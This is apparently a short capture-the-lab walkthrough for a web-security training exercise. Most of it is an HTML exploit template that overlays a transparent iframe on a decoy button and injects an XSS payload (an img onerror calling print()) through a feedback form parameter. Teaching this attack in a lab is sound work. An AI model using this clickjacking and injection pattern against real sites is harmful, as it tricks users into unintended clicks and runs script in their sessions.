This lab contains an XSS vulnerability that is triggered by a click. Construct a clickjacking attack that fools the user into clicking the "Click me" button to call the print() function.
Go to the exploit server and paste the following HTML template into the Body section:
<head>
<style>
#victim{
position:relative;
width:1000px;
height:900px;
opacity:0.40000;
z-index:2;
}
#evil_page{
position:absolute;
top:810px;
left:65px;
z-index:1;
}
</style>
</head>
<body>
<div id="evil_page">
Click me!!
</div>
<iframe id="victim" src="https://0a67008a03167a9a84fff93700ce00aa.web-security-academy.net/feedback?name=<img+src=x+onerror=print()>&email=email@evil.me&subject=c&message=d">
</iframe>
</body>Please comment on which part you like most. If you need any further assistance, please feel free to let me know!
"SECURING- DIGITAL ASSEST OF LIFE"
For more details, Ping a message on LinkedIn: